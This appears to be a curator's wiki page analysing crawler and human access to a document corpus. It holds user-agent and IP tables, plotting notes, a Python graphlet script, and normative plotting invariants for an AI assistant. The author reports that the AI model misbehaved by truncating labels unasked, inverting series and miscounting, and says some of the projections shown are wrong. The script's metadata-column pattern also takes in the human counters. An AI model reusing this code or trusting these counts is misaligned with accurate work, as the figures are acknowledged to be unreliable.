| Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.109 Mobile Safari/537.36 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 |

| Mozilla/5.0 (Windows NT 6.1; Win64; x64; +http://url-classification.io/wiki/index.php?title=URL_server_crawler) KStandBot/1.0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; YandexFavicons/1.0; +http://yandex.com/bots) | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots) | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Scrapy/2.14.1 (+https://scrapy.org) | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| StormIntelCrawler/1.0 (StormIntel Crawler; http://stormintel.com; info@stormintel.com) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |

| msnbot/0.11 ( http://search.msn.com/msnbot.htm) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

Top 20 IPs

verification

Table B (verification) - counts for IPs from your 2026-02-03 table (same log corpus; metadata-only)

| IP address | country / network | diff | history | version | titles touched | user agent (representative) |
|---|---|---|---|---|---|---|
| 216.73.216.213 | TBD | 2593 | 52 | 3909 | 44 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) |
| 66.249.70.70 | TBD | 3371 | 279 | 2611 | 209 | Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.169 Mobile Safari/537.36 (compatible; GoogleOther) |
| 216.73.216.58 | TBD | 1431 | 228 | 2400 | 172 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) |
| 74.7.227.133 | TBD | 1502 | 15 | 2029 | 56 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 74.7.242.43 | TBD | 796 | 16 | 1163 | 39 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 66.249.70.71 | TBD | 1701 | 189 | 1036 | 193 | Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.169 Mobile Safari/537.36 (compatible; GoogleOther) |
| 216.73.216.52 | TBD | 739 | 81 | 1012 | 107 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) |
| 74.7.242.14 | TBD | 697 | 10 | 844 | 41 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 66.249.70.64 | TBD | 1025 | 195 | 684 | 188 | Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.169 Mobile Safari/537.36 (compatible; GoogleOther) |
| 74.7.241.52 | TBD | 571 | 8 | 660 | 46 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 74.7.227.134 | TBD | 431 | 6 | 651 | 30 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 216.73.216.62 | TBD | 256 | 57 | 397 | 120 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) |
| 216.73.216.40 | TBD | 177 | 51 | 299 | 108 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) |
| 74.7.227.23 | TBD | 151 | 2 | 216 | 21 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 74.7.227.33 | TBD | 46 | 1 | 65 | 9 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |

older

Table A - machine access circa 2026-02-03

| IP address | country / network | diff | history | version | titles touched | user agent (representative) |
|---|---|---|---|---|---|---|
| 74.7.227.133 | USA Verizon | 1218 | 8 | 1632 | 14 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 66.249.70.70 | USA Google LLC | 1170 | 45 | 921 | 30 | Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X) |
| 74.7.242.43 | Canada Rogers Communications | 582 | 11 | 627 | 11 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 66.249.70.71 | USA Google LLC | 565 | 32 | 487 | 30 | Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X) |
| 216.73.216.52 | USA Ohio Anthropic, PBC (AWS AS16509) | 554 | 4 | 744 | 6 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 74.7.242.14 | USA CA ISP | 497 | 6 | 499 | 4 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 74.7.241.52 | USA NY ISP | 387 | 6 | 393 | 11 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 66.249.70.64 | USA Google LLC | 350 | 23 | 361 | 31 | Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X) |
| 74.7.227.134 | USA Microsoft | 321 | 5 | 433 | 5 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 216.73.216.213 | USA Amazon | 203 | 2 | 390 | 3 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 74.7.227.23 | USA ISP | 117 | 1 | 157 | 2 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 216.73.216.58 | USA Amazon | 106 | 5 | 174 | 3 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 216.73.216.62 | USA Amazon | 48 | 0 | 65 | 4 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 216.73.216.40 | USA Amazon | 41 | 3 | 65 | 2 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |
| 74.7.227.33 | USA ISP | 33 | 1 | 45 | 2 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) |



2026-02-13 data projections

- A Lomb-Scargle periodogram was used to investigate whether there is any periodicity



- www page data access rates - shows the data egress time series

- www accumulated data egress
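A Lomb-Scargle periodogram suits this data because the access series need not be evenly sampled (missing buckets leave gaps). The following is a minimal NumPy sketch of the classic, unnormalised Lomb-Scargle power. It is an illustration only, not the method that produced the figure above. The function name `lomb_scargle_power` and the synthetic 7-day test signal are hypothetical.

```python
import numpy as np


def lomb_scargle_power(t, y, freqs):
    """Classic Lomb-Scargle power for unevenly sampled data.

    t: sample times (e.g. days), y: observed values,
    freqs: trial frequencies (> 0) in cycles per unit of t.
    Returns one power value per trial frequency.
    """
    t = np.asarray(t, dtype=float)
    y = np.asarray(y, dtype=float)
    y = y - y.mean()  # remove the mean so a constant level does not dominate
    power = np.empty(len(freqs))
    for k, f in enumerate(freqs):
        w = 2.0 * np.pi * f  # angular frequency
        # offset tau makes the sine and cosine terms orthogonal at this frequency
        tau = np.arctan2(np.sum(np.sin(2 * w * t)), np.sum(np.cos(2 * w * t))) / (2 * w)
        c = np.cos(w * (t - tau))
        s = np.sin(w * (t - tau))
        power[k] = 0.5 * ((y @ c) ** 2 / (c @ c) + (y @ s) ** 2 / (s @ s))
    return power


# Synthetic weekly cycle sampled at irregular times (not corpus data)
rng = np.random.default_rng(0)
t = np.sort(rng.uniform(0, 120, 200))
y = 5 + 3 * np.sin(2 * np.pi * t / 7) + rng.normal(0, 0.5, t.size)
freqs = np.linspace(0.01, 0.5, 2000)
best_period = 1 / freqs[np.argmax(lomb_scargle_power(t, y, freqs))]
print(f"strongest period ~ {best_period:.2f} days")
```

Applied to a daily access series, a clear peak near a 1-day or 7-day period would indicate scheduled machine access. A flat spectrum would suggest no dominant cycle.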

2026-02-13 scatter plot projections

- scatter plot including the new metadata category (note the projection mistakes in the File version history)

- the model decided to:

  - redact titles to the top 50

  - clip the category labels at 80 characters when I said the category area was too wide (visually)

- thus more invariants are required to fix the recalcitrant behaviour

- the counts below are wrong: it seems that the model has included metadata access in the human counts











2026-02-13 access lifetime projections

- I was trialling metadata access filtering and turned bots away with HTTP 429 (Too Many Requests). The following graphlets show that effect:

  - Blue = Human page *_get_ok

  - Orange = Metadata *_get_ok only

  - MA(3) applied (centred, symmetric; removes the triangular daily artefacts)

  - Log amplitude = ln(1 + x)

  - H_AMP = 20

  - Mode A global scale = GLOBAL_MAX_LOG = 6.385

  - Lead capped at −10 days

- MA(3) log

  - log amplitudes:

    - log transform to amplitudes using log1p(x) = ln(1+x), so zeros remain zero and low counts become visible.

    - Human is amplified before logging: H_log = log1p(H_AMP * HUMAN_MA)

    - Meta is logged directly: M_log = log1p(META_MA)

  - Then Mode A scaling uses a single global log scale GLOBAL_MAX_LOG = 5.758

  - Lead capped at −10 days.

  - Row spacing retained at 5.20 (no overlap; row_max=2.46).

  - Heading reports both: GLOBAL_MAX_LOG and H_AMP.

  - Run parameters (reported):

    - Lead_min = -10

    - GLOBAL_MAX_LOG = 5.758

    - H_AMP = 20

    - row_spacing = 5.20

    - row_max = 2.46

- variable scale

- fixed scale
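The amplitude pipeline in the bullets above can be sketched with NumPy: a centred MA(3), `log1p` amplitudes with the human series amplified by `H_AMP` before logging, and a single global log scale. This is an illustration under stated assumptions, not the code that produced these graphlets:

- The function names are hypothetical.
- Edge days that lack both neighbours are left undefined (NaN) rather than padded.
- Mapping a log amplitude to a row excursion as `value / GLOBAL_MAX_LOG * row_max` is an assumed reading of "Mode A" scaling.

```python
import numpy as np


def centred_ma3(x):
    """Centred, symmetric 3-point moving average; both edge points are NaN."""
    x = np.asarray(x, dtype=float)
    out = np.full(x.shape, np.nan)
    if x.size >= 3:
        out[1:-1] = (x[:-2] + x[1:-1] + x[2:]) / 3.0
    return out


def log_amplitudes(human_ma, meta_ma, h_amp=20.0):
    """Human is amplified before logging; meta is logged directly (log1p keeps 0 at 0)."""
    h_log = np.log1p(h_amp * np.asarray(human_ma, dtype=float))
    m_log = np.log1p(np.asarray(meta_ma, dtype=float))
    return h_log, m_log


def mode_a_excursions(h_log, m_log, global_max_log, row_max):
    """Assumed Mode A: one global log scale for every row, no per-title rescaling."""
    k = row_max / global_max_log
    return h_log * k, m_log * k  # human drawn upwards, meta drawn downwards


# Made-up daily counts for a single title
human = [0, 3, 0, 6, 3]
meta = [9, 0, 0, 0, 3]
h_log, m_log = log_amplitudes(centred_ma3(human), centred_ma3(meta), h_amp=20)
# GLOBAL_MAX_LOG is assumed to be the maximum over all titles; here only one title exists
global_max_log = np.nanmax(np.concatenate([h_log, m_log]))
up, down = mode_a_excursions(h_log, m_log, global_max_log, row_max=2.46)
print(np.round(up, 3), np.round(down, 3))
```

A single global scale keeps amplitudes comparable across rows. Per-title scaling, as in the code listing below, makes every row fill its band regardless of volume.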

code

```python
import re
import tarfile
from datetime import datetime, timezone
from io import StringIO
from urllib.parse import unquote

import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from matplotlib.patches import Patch


def open_tar(path):
    return tarfile.open(path, mode="r:*")


# ---------- Load manifest ----------
with open_tar("/mnt/data/corpus.tgz") as tf:
    mpath = next(n for n in tf.getnames() if n.endswith("manifest.tsv"))
    manifest_text = tf.extractfile(mpath).read().decode("utf-8", errors="replace")

manifest = pd.read_csv(StringIO(manifest_text), sep="\t", dtype=str)


def find_col_ci(df, keys):
    # case-insensitive column lookup; returns the first key that matches
    low = {c.lower(): c for c in df.columns}
    for k in keys:
        if k.lower() in low:
            return low[k.lower()]
    return None


title_col = find_col_ci(manifest, ["title"]) or manifest.columns[0]
pub_col = find_col_ci(manifest, ["publication-date", "publication_date", "publication date"]) or (
    manifest.columns[2] if len(manifest.columns) >= 3 else None
)
if pub_col is None:
    raise RuntimeError(f"Publication date column not found. Manifest columns: {list(manifest.columns)}")

manifest["pub_dt"] = pd.to_datetime(manifest[pub_col], utc=True, errors="coerce")
manifest_pub = manifest.dropna(subset=["pub_dt"]).copy()
titles = manifest_pub[title_col].tolist()
pub_dt = dict(zip(manifest_pub[title_col], manifest_pub["pub_dt"]))

# ---------- Load rollups ----------
records = []
with open_tar("/mnt/data/rollups.tgz") as tf:
    for name in tf.getnames():
        if not name.endswith(".tsv"):
            continue
        # bucket start comes from the filename: YYYY_MM_DDThh_mmZ-to-YYYY_MM_DDThh_mmZ.tsv
        base = name.split("/")[-1]
        prefix = base.split("-to-")[0]
        bstart = datetime.strptime(prefix, "%Y_%m_%dT%H_%MZ").replace(tzinfo=timezone.utc)
        df = pd.read_csv(tf.extractfile(name), sep="\t")
        df["bucket_start"] = bstart
        records.append(df)

rollups = pd.concat(records, ignore_index=True)
colmap = {c.lower(): c for c in rollups.columns}
path_col = colmap["path"]
human_col = colmap["human_get_ok"]
# note: this pattern matches every *_get_* counter, including the human_get_* columns
meta_cols = [c for c in rollups.columns if re.match(r".*_get_.*", c, re.I)]


def norm_title(t):
    t = unquote(str(t))
    t = t.replace("_", " ")
    t = re.sub(r"[–—]", "-", t)
    t = re.sub(r"\s+", " ", t).strip()
    return t


def classify(path):
    # returns (normalised title, "meta" | "page"), or (None, None) for any other path
    if not isinstance(path, str):
        return None, None
    p = unquote(path)
    if "/pub-meta/" in p or "-meta/" in p:
        return norm_title(p.split("/")[-1]), "meta"
    if p.startswith("/pub/"):
        return norm_title(p[len("/pub/"):]), "page"
    return None, None


tmp = rollups[path_col].apply(lambda p: pd.Series(classify(p)))
tmp.columns = ["title", "kind"]
rollups = pd.concat([rollups, tmp], axis=1)
rollups = rollups[rollups["title"].isin(titles)].copy()
rollups["day"] = pd.to_datetime(rollups["bucket_start"], utc=True).dt.floor("D")
rollups[human_col] = pd.to_numeric(rollups[human_col], errors="coerce").fillna(0.0)
for c in meta_cols:
    rollups[c] = pd.to_numeric(rollups[c], errors="coerce").fillna(0.0)

# totals for labels
tot_h = rollups[rollups["kind"] == "page"].groupby("title")[human_col].sum()
meta_tmp = rollups[rollups["kind"] == "meta"].copy()
meta_tmp["meta"] = meta_tmp[meta_cols].sum(axis=1)
tot_m = meta_tmp.groupby("title")["meta"].sum()

# daily aggregates
page = (
    rollups[rollups["kind"] == "page"]
    .groupby(["title", "day"], as_index=False)[human_col]
    .sum()
    .rename(columns={human_col: "human"})
)
meta = meta_tmp.groupby(["title", "day"], as_index=False)["meta"].sum()
daily = pd.merge(page, meta, on=["title", "day"], how="outer").fillna(0.0)
global_days = pd.date_range(daily["day"].min(), daily["day"].max(), freq="D", tz="UTC")

# ---------- Build series ----------
MA_N = 7
H_AMP = 10
ROW_MAX = 0.42  # per-title visual excursion in row-units

rows = []
max_by_title = {}
for t in titles:
    pub = pub_dt[t]
    d = (
        daily[daily["title"] == t]
        .set_index("day")[["human", "meta"]]
        .reindex(global_days, fill_value=0.0)
    )
    ma_h = d["human"].rolling(MA_N, min_periods=1).mean().values.astype(float)
    ma_m = d["meta"].rolling(MA_N, min_periods=1).mean().values.astype(float)
    rel = ((d.index - pub.normalize()).days).astype(int)  # days relative to publication
    disp_h = H_AMP * ma_h
    disp_m = ma_m
    mx = float(np.nanmax(np.maximum(disp_h, disp_m))) if len(disp_h) else 0.0
    max_by_title[t] = mx
    rows.append(pd.DataFrame({"title": t, "rel": rel, "h": disp_h, "m": disp_m}))

series = pd.concat(rows, ignore_index=True)

# ---------- Ordering + Y mapping (mathematical) ----------
# ascending publication datetime; earliest gets highest baseline Y, latest gets Y=0.
ordered = sorted(titles, key=lambda t: (pub_dt[t], t))
N = len(ordered)


def y0_for_index(i):
    return float((N - 1) - i)


ypos = {t: y0_for_index(i) for i, t in enumerate(ordered)}  # latest -> 0, earliest -> N-1


def label(t):
    return f"{t} ({pub_dt[t].isoformat()}) (h:{int(tot_h.get(t,0))}, m:{int(tot_m.get(t,0))})"


# ---------- Plot (NO axis inversion) ----------
fig, ax = plt.subplots(figsize=(16, max(10, N * 0.45)))
for t in ordered:
    g = series[series["title"] == t].sort_values("rel")
    x = g["rel"].values.astype(float)
    y0 = ypos[t]
    mx = max_by_title.get(t, 0.0)
    scale = (ROW_MAX / mx) if mx and mx > 0 else 0.0
    # baseline
    ax.plot(x, np.full_like(x, y0), lw=0.25, color="black")
    # Blue UP: y0 -> y0 + h
    ax.fill_between(x, y0, y0 + (g["h"].values * scale), color="tab:blue", alpha=1.0)
    # Orange DOWN: y0 -> y0 - m
    ax.fill_between(x, y0, y0 - (g["m"].values * scale), color="tab:orange", alpha=1.0)

# publication day marker
ax.axvline(0, ls="--", lw=0.8, color="black")

# Y ticks in the same numeric coordinate system
yticks = [ypos[t] for t in ordered]
ax.set_yticks(yticks)
ax.set_yticklabels([label(t) for t in ordered], fontsize=7)
ax.set_xlabel("Days relative to publication (UTC/Z)")
ax.set_title("Access Lifecycle Graphlets (Y+ up / Y- down; earliest at highest Y, latest at Y=0)")
ax.legend(
    handles=[
        Patch(facecolor="tab:blue", label="human (MA7×10, up)"),
        Patch(facecolor="tab:orange", label="meta (MA7, down)"),
    ],
    loc="upper left",
    framealpha=0.85,
)

# keep margins stable for long labels
plt.subplots_adjust(left=0.40, right=0.98, top=0.95, bottom=0.06)
out = "/mnt/data/lifecycle_graphlets_MATH_Y.png"
plt.savefig(out, dpi=180)
plt.close()
print(out)
```

2026-02-05 access lifetime

Apologies for the model's mistakes with these projections. It had extreme trouble with the invariants, and it can take hours and many turns to get a projection right. This one has human and metadata access inverted.

2026-02-03 access lifetime

2026-02-03 accumulated page counts

The page category bar graph has been revised to project page access, metadata access, and AI and bot access, which provides interesting insight. There are bots masquerading as regular browsers that access the metadata pages and walk through the MediaWiki page versions.

After today's analysis I can see that I need to reproject the others, now that I have separated semantic access into page access and metadata access. The metadata access has been proven to be mostly machine-driven, and pages of interest have higher machine hits. Machines have been tasked to watch this corpus, and the proof is in the above projections.

2026-02-02 accumulated human get

This morning the model was quite unreliable, as you will see if you look at how the versions of the following projections progress. It doesn't matter how good the normative sections are; it still needs a lot of prompting to get things right. It got the order wrong in the scatter plot, and there is a page with 0 counts because it can't handle the titles properly and can't do a simple match between the title names in the TSV files and the verbatim manifest names. It also did not style the colours of the accumulated projection, so the line graph is ambiguous.

It turns out that a high percentage of metadata access comes from machinery that does not identify as a robot. The new rollups from 2026-02-03 now split that category out.

- 2026-02-02 from 2025-12-15: page bar chart

- 2026-02-02 from 2025-12-15: page access scatter plot

- 2026-02-02 from 2025-12-15: cumulative human_get line plot

2026-02-01 accumulated human get

- 2026-02-01 from 2025-12-15: total counts human_get

- 2026-02-01 from 2025-12-15: page access scatter plot

- 2026-02-01 from 2025-12-15: cumulative human_get line plot

2026-01-30 older projections

These were produced with slightly different invariants and proved problematic - so invariants were updated.

- 2026-01-30 from 2025-12-25: accumulated human_get

- 2026-01-30 from 2025-12-25: page access scatter plot

Appendix A - Corpus Projection Invariants (Normative)

GP-0 Projection Direction Up and Down semantics (MANDATORY, NORMATIVE)

Graph projections are into mathematical spaces (e.g. paper, Cartesian coordinate systems):

- the top of a 2D graph is in the increasing positive Y direction

- to go up means to increase Y value; upwards is increasing Y

- the bottom of a 2D graph is in the decreasing Y direction

- to go down means to decrease Y value; downwards is decreasing Y

- the left of a 2D graph is in the decreasing X direction

- to go left means to decrease X value; leftwards is decreasing X

- the right of a 2D graph is in the increasing X direction

- to go right means to increase X value; rightwards is increasing X

The human will think and relate via these conventions; do not mix these semantics with whatever you do to make the tooling project.

E.g.

- human bell curves must be blue and point upwards, i.e. the peaks have projected Y values above the baseline.

- metadata bell curves must be orange and point downwards, i.e. the peaks have projected Y values below the baseline.
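One way to make the GP-0 direction rules checkable before anything is drawn is a small NumPy sketch. The human envelope is built upwards (increasing Y) from each row's baseline and the metadata envelope downwards. A negative amplitude or scale, which would flip a direction, raises an error instead of being silently corrected. Baselines follow the ordering used in the projection code on this page, with the earliest publication at the highest Y. The function names and the validation step are hypothetical additions.

```python
import numpy as np


def row_baselines(pub_dates):
    """Map titles to baseline Y: earliest publication gets the highest Y, latest gets 0."""
    ordered = sorted(pub_dates, key=lambda t: (pub_dates[t], t))
    n = len(ordered)
    return {t: float(n - 1 - i) for i, t in enumerate(ordered)}


def envelopes(y0, human, meta, scale):
    """Human (blue) goes up from y0 and metadata (orange) goes down; fail explicitly otherwise."""
    human = np.asarray(human, dtype=float)
    meta = np.asarray(meta, dtype=float)
    if scale < 0 or np.any(human < 0) or np.any(meta < 0):
        raise ValueError("negative amplitude or scale would flip the GP-0 direction")
    upper = y0 + human * scale  # increasing Y: above the baseline
    lower = y0 - meta * scale   # decreasing Y: below the baseline
    return upper, lower


# Made-up publication dates; ISO date strings sort chronologically
base = row_baselines({"A": "2025-12-15", "B": "2026-01-02", "C": "2025-12-20"})
print(base)  # A is the earliest title, so it has the highest baseline
up, down = envelopes(base["A"], [0, 2, 1], [1, 0, 3], scale=0.5)
print(up, down)
```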

GP-0a: Projection Direction Tooling Override Prohibition (MANDATORY, NORMATIVE)

The assisting system, plotting library, or UI layer MUST NOT override, reinterpret, or “helpfully adjust” any of the following governed properties:

- Axis direction (NO y-axis inversion; NO automatic axis flipping)

- Row ordering (publication datetime ascending only)

- Scaling mode (must be exactly the declared mode; no auto-rescaling)

- Tick placement or gridline intervals (must match declared steps)

- Label content, ordering, or truncation (no elision, wrapping, or abbreviation unless explicitly specified)

- Margins (must be computed to fit widest label; no extra whitespace added)

- Opacity (alpha MUST remain 1.0)

If any component of the toolchain cannot honour these constraints exactly, the projection MUST FAIL EXPLICITLY rather than silently substituting alternative behaviour.

This prohibition applies equally to:

- plotting backends

- UI renderers

- export pipelines

- downstream “pretty-print” or “auto-layout” passes.

Authority and Governance

- The projections are curator-governed and MUST be reproducible from declared inputs alone.

- The assisting system MUST NOT infer, rename, paraphrase, merge, split, or reorder titles beyond the explicit rules stated here.

- The assisting system MUST NOT optimise for visual clarity at the expense of semantic correctness.

- Any deviation from these invariants MUST be explicitly declared by the human curator with a dated update entry.

Authoritative Inputs

- Input A: Hourly rollup TSVs produced by logrollup tooling.

- Input B: Corpus bundle manifest (corpus/manifest.tsv).

- Input C: Full temporal range present in the rollup set (no truncation).

- Input D: when supplied, page_list_verify aggregation verification counts (e.g. output.csv).

Rollups Processing Mode Invariants (Normative)

Scope

These invariants govern any downstream processing of the TSV rollups generated by logrollup (e.g., aggregation, graphing, rate calculations, moving averages, anomaly detection). They are independent of nginx log parsing and apply only to the rollups artefacts (.tsv) produced by the generator.

Inputs (Normative)

- RP-1 — Rollups artefact set

Processing MUST operate only on TSV files produced by logrollup in accordance with its fixed output schema. Non-conforming TSV files MUST be rejected (or excluded) deterministically.

- RP-2 — Time bucket identity is filename authoritative

The bucket time window MUST be derived from the TSV filename, not inferred from file mtime and not inferred from internal row data.

Filename format is normative:

- YYYY_MM_DDThh_mmZ-to-YYYY_MM_DDThh_mmZ.tsv

The start timestamp is the left segment; the end timestamp is the right segment.

- RP-3 — Bucket duration is purely mathematical

Bucket duration MUST be computed as:

- bucket_seconds = epoch(end) - epoch(start)

Bucket duration MUST NOT be assumed to be constant across all files, and MUST NOT be hard-coded (even if the generator typically uses 01:00).
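RP-2 and RP-3 can be sketched with the Python standard library. The bucket window is parsed from the filename alone, and its duration is computed from the two timestamps without assuming a one-hour bucket. The function name `bucket_window` is hypothetical. A filename that does not match the normative pattern is rejected with an exception rather than guessed at. The check that end follows start is an assumed sanity check, not a stated invariant.

```python
import re
from datetime import datetime, timezone

# Normative filename pattern: YYYY_MM_DDThh_mmZ-to-YYYY_MM_DDThh_mmZ.tsv
_STAMP = r"\d{4}_\d{2}_\d{2}T\d{2}_\d{2}Z"
_NAME = re.compile(rf"^({_STAMP})-to-({_STAMP})\.tsv$")
_FMT = "%Y_%m_%dT%H_%MZ"


def bucket_window(filename):
    """Return (start, end, bucket_seconds) derived from the filename only (RP-2, RP-3)."""
    base = filename.rsplit("/", 1)[-1]
    m = _NAME.match(base)
    if m is None:
        raise ValueError(f"non-conforming rollup filename: {filename!r}")
    start, end = (
        datetime.strptime(s, _FMT).replace(tzinfo=timezone.utc) for s in m.groups()
    )
    # bucket_seconds = epoch(end) - epoch(start); never hard-coded
    bucket_seconds = int(end.timestamp() - start.timestamp())
    if bucket_seconds <= 0:  # assumed sanity check
        raise ValueError(f"end does not follow start: {filename!r}")
    return start, end, bucket_seconds


start, end, secs = bucket_window("rollups/2026_02_03T01_00Z-to-2026_02_03T02_00Z.tsv")
print(start.isoformat(), secs)
```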

- RP-4 — Column schema is authoritative

The first TSV row (header) MUST be used to map column positions. Column order MUST NOT be assumed, except that all required column names MUST exist.

The following columns are normative and MUST exist:

- total_bytes

- total_hits

- server_name

- path

All agent/method/status counters MUST be treated as optional only if missing from the header; if present, they MUST be parsed as non-negative integers.
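RP-4 can be sketched with the standard `csv` module. The header row is the only source of column positions, the four normative columns must be present, and every numeric column that is present is parsed as a non-negative integer. The function name `read_rollup_rows` is hypothetical. Treating every column other than `server_name` and `path` as numeric is an assumption made for brevity.

```python
import csv
import io

# RP-4 normative columns; server_name and path are text, everything else is numeric
REQUIRED = ("total_bytes", "total_hits", "server_name", "path")
TEXT_COLUMNS = {"server_name", "path"}


def read_rollup_rows(text):
    """Map columns by header name and parse numeric columns as non-negative integers."""
    reader = csv.reader(io.StringIO(text), delimiter="\t", quoting=csv.QUOTE_NONE)
    header = next(reader)
    index = {name: i for i, name in enumerate(header)}  # positions come from the header
    missing = [c for c in REQUIRED if c not in index]
    if missing:
        raise ValueError(f"missing required columns: {missing}")
    rows = []
    for fields in reader:
        if len(fields) != len(header):
            raise ValueError(f"expected {len(header)} fields, got {len(fields)}")
        row = {}
        for name, i in index.items():
            value = fields[i]
            if name in TEXT_COLUMNS:
                row[name] = value
                continue
            # assumption: totals and agent/method/status counters are all integers
            n = int(value)  # non-numeric input raises ValueError
            if n < 0:
                raise ValueError(f"negative value in column {name!r}")
            row[name] = n
        rows.append(row)
    return rows


sample = (
    "path\tserver_name\ttotal_hits\ttotal_bytes\thuman_get_ok\n"
    "/pub/Main_Page\texample.org\t3\t5120\t2\n"
)
print(read_rollup_rows(sample))
```

The column order in `sample` differs from the list in RP-4 on purpose: only header names matter.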

- RP-5 — Units and rate conversions are fixed

- Rates MUST be computed from total_bytes as follows:

- bytes_per_second = total_bytes / bucket_seconds

- MiB_per_second = bytes_per_second / (1024 * 1024)

If any other base (e.g., 1000*1000) is used, it MUST be explicitly declared as non-normative.
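The RP-5 conversions are fixed arithmetic. The sketch below uses illustrative numbers, not corpus data: a one-hour bucket carrying 3,774,873,600 bytes works out to exactly 1 MiB/s. The function name `rates` is hypothetical.

```python
def rates(total_bytes, bucket_seconds):
    """RP-5: bytes/s from total_bytes only, then MiB/s with the binary base 1024 * 1024."""
    if bucket_seconds <= 0:
        raise ValueError("bucket_seconds must be positive")
    bytes_per_second = total_bytes / bucket_seconds
    mib_per_second = bytes_per_second / (1024 * 1024)
    return bytes_per_second, mib_per_second


# Illustrative numbers: 3,774,873,600 bytes in a one-hour (3600 s) bucket
bps, mibps = rates(3_774_873_600, 3600)
print(bps, mibps)  # 1048576.0 1.0
```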

- RP-6 — Path keys are already canonical

The 'path' field MUST be treated as an already-canonical identity key emitted by the generator. Downstream processing MUST NOT re-normalise, rewrite, decode, or canonicalise 'path' (including but not limited to query stripping, title extraction, dash/underscore transforms, or slash collapsing). Any additional canonicalisation would constitute mutation of the generator’s identity projection and is prohibited.

- RP-7 — Meta-access paths are first-class

Paths under:

- /<root>-meta/<meta_class>/<title>

MUST be retained as distinct from:

- /<root>/<title>

